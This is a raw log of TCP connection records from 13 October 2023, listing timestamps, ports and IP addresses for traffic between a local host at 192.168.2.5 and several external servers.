Oct 13, 2023 15:21:07.671760082 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.671843052 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.671849012 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.672185898 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.672250986 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.672255993 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.677886009 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.678010941 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.678020000 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.718242884 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.718342066 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.718357086 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:07.759346962 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:07.953265905 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:08.067854881 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.067867041 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.067889929 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.067920923 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:08.067986012 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:08.067997932 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.068264961 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.068273067 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.068300009 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.068315029 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:08.068325043 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.068357944 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:08.068816900 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.068824053 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.068962097 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:08.068967104 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.069097042 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.069143057 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:08.069150925 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.069161892 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.069194078 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:08.069236994 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:08.069312096 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:08.069328070 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.069345951 CEST	49730	443	192.168.2.5	213.6.54.58
Oct 13, 2023 15:21:08.069355965 CEST	443	49730	213.6.54.58	192.168.2.5
Oct 13, 2023 15:21:08.070631027 CEST	49734	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:08.123377085 CEST	49735	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:08.224955082 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:08.224955082 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:08.276077986 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:08.276175022 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:08.276215076 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:08.276391983 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:08.321969032 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:08.377814054 CEST	80	49734	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:08.377903938 CEST	49734	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:08.408379078 CEST	49734	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:08.449673891 CEST	80	49735	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:08.449928045 CEST	49735	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:08.530375004 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:08.530414104 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:08.530494928 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:08.532754898 CEST	49735	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:08.576905966 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:08.593923092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:08.598530054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:08.598530054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:08.609405041 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:08.609430075 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:08.764483929 CEST	80	49734	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:08.907445908 CEST	80	49735	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:08.950356960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:08.968087912 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:21:09.009439945 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:09.257024050 CEST	49737	443	192.168.2.5	172.67.196.133
Oct 13, 2023 15:21:09.257060051 CEST	443	49737	172.67.196.133	192.168.2.5
Oct 13, 2023 15:21:09.257152081 CEST	49737	443	192.168.2.5	172.67.196.133
Oct 13, 2023 15:21:09.258249044 CEST	49737	443	192.168.2.5	172.67.196.133
Oct 13, 2023 15:21:09.258260012 CEST	443	49737	172.67.196.133	192.168.2.5
Oct 13, 2023 15:21:09.285928011 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:09.309168100 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:09.349281073 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:09.349447966 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:09.518902063 CEST	80	49734	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:09.518961906 CEST	80	49734	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:09.519051075 CEST	49734	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:09.600553036 CEST	443	49737	172.67.196.133	192.168.2.5
Oct 13, 2023 15:21:09.600653887 CEST	49737	443	192.168.2.5	172.67.196.133
Oct 13, 2023 15:21:09.616928101 CEST	80	49735	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:09.617034912 CEST	80	49735	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:09.617136002 CEST	49735	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:09.617136955 CEST	49735	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:09.624533892 CEST	49737	443	192.168.2.5	172.67.196.133
Oct 13, 2023 15:21:09.624566078 CEST	443	49737	172.67.196.133	192.168.2.5
Oct 13, 2023 15:21:09.625087023 CEST	443	49737	172.67.196.133	192.168.2.5
Oct 13, 2023 15:21:09.626327991 CEST	49737	443	192.168.2.5	172.67.196.133
Oct 13, 2023 15:21:09.631794930 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:09.633686066 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:09.637336969 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:09.666543961 CEST	443	49737	172.67.196.133	192.168.2.5
Oct 13, 2023 15:21:09.681229115 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:09.694071054 CEST	49734	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:09.695197105 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:10.000623941 CEST	80	49734	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:10.091608047 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:10.259562969 CEST	443	49737	172.67.196.133	192.168.2.5
Oct 13, 2023 15:21:10.259691000 CEST	443	49737	172.67.196.133	192.168.2.5
Oct 13, 2023 15:21:10.259751081 CEST	49737	443	192.168.2.5	172.67.196.133
Oct 13, 2023 15:21:10.763689995 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:10.763945103 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:10.764775038 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:10.764988899 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:10.765032053 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:10.765094042 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:10.766603947 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:10.766638041 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:10.766664982 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:10.766706944 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:10.890963078 CEST	49737	443	192.168.2.5	172.67.196.133
Oct 13, 2023 15:21:10.890990973 CEST	443	49737	172.67.196.133	192.168.2.5
Oct 13, 2023 15:21:11.082288980 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:11.082314014 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:11.082843065 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:11.082892895 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:11.084866047 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:11.085676908 CEST	49735	80	192.168.2.5	14.33.209.147
Oct 13, 2023 15:21:11.113444090 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.113509893 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.114850998 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.114900112 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.116231918 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.116278887 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.117491007 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.117542982 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.118670940 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.118730068 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.119285107 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.119343996 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.120198011 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.120255947 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.130444050 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:11.169310093 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:11.169394970 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:11.169478893 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:11.169965982 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:11.170002937 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:11.318394899 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:11.414068937 CEST	80	49735	14.33.209.147	192.168.2.5
Oct 13, 2023 15:21:11.462234020 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.462306976 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.464034081 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.464096069 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.464638948 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.464694023 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.466538906 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.466590881 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.467063904 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.467117071 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.468226910 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.468329906 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.469057083 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.469109058 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.470082998 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.470134974 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.470555067 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.470608950 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.471533060 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.471592903 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.472067118 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.472121000 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.472558022 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.472609043 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.473588943 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.473648071 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.474066973 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.474118948 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.513266087 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:11.513366938 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:11.514750004 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:11.514776945 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:11.515130043 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:11.515739918 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:11.558468103 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:11.637993097 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:11.639874935 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:11.811264038 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.811346054 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.812659979 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.812716961 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.813129902 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.813179970 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.814074993 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.814126015 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.815603971 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.815660954 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.816679001 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.816734076 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.818087101 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.818139076 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.818180084 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.818227053 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.819237947 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.819289923 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.820105076 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.820156097 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.820662022 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.820713043 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.821626902 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.821679115 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.822120905 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.822179079 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.822715998 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.822774887 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.823170900 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.823220015 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.823643923 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.823697090 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.824616909 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.824661016 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.825149059 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.825196981 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.825606108 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.825654030 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.826138020 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.826191902 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.826215029 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.826256990 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.826587915 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.826637983 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.827064037 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.827112913 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.827702999 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.827763081 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.828119040 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.828171015 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.828619957 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.828669071 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.828696966 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.828746080 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.829139948 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.829195023 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.829591990 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:11.829639912 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:11.959553957 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:11.967484951 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:12.160778999 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.160865068 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.161632061 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.161688089 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.162745953 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.162796021 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.164154053 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.164199114 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.164603949 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.164654016 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.165647984 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.165703058 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.167079926 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.167143106 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.167607069 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.167659998 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.168658018 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.168715954 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.169140100 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.169203043 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.170114994 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.170170069 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.170721054 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.170773983 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.171180964 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.171228886 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.171946049 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.171998024 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.172631979 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.172688961 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.173158884 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.173208952 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.173625946 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.173701048 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.174592018 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.174643993 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.174652100 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.174702883 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.175105095 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.175152063 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.175642014 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.175693035 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.176146984 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.176196098 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.176646948 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.176695108 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.176719904 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.176767111 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.177135944 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.177196980 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.177639961 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.177687883 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.178400040 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.178468943 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.178513050 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.178561926 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.178930044 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.178982019 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.179337978 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.179379940 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.179387093 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.179402113 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.179423094 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.179439068 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.179490089 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.179497004 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.179548979 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.180136919 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.180207968 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.181080103 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.181107044 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.181155920 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.181176901 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.181185007 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:12.181221962 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.181230068 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.181252003 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:12.181358099 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.181407928 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.181612015 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.181648016 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.181662083 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.181704044 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.181704998 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.181750059 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.182295084 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.182356119 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.182374954 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.182420015 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.182558060 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.182605982 CEST	49738	80	192.168.2.5	187.18.108.158
Oct 13, 2023 15:21:12.182665110 CEST	80	49738	187.18.108.158	192.168.2.5
Oct 13, 2023 15:21:12.182712078 CEST	49738	80	192.168.2.5	187.18.108.158
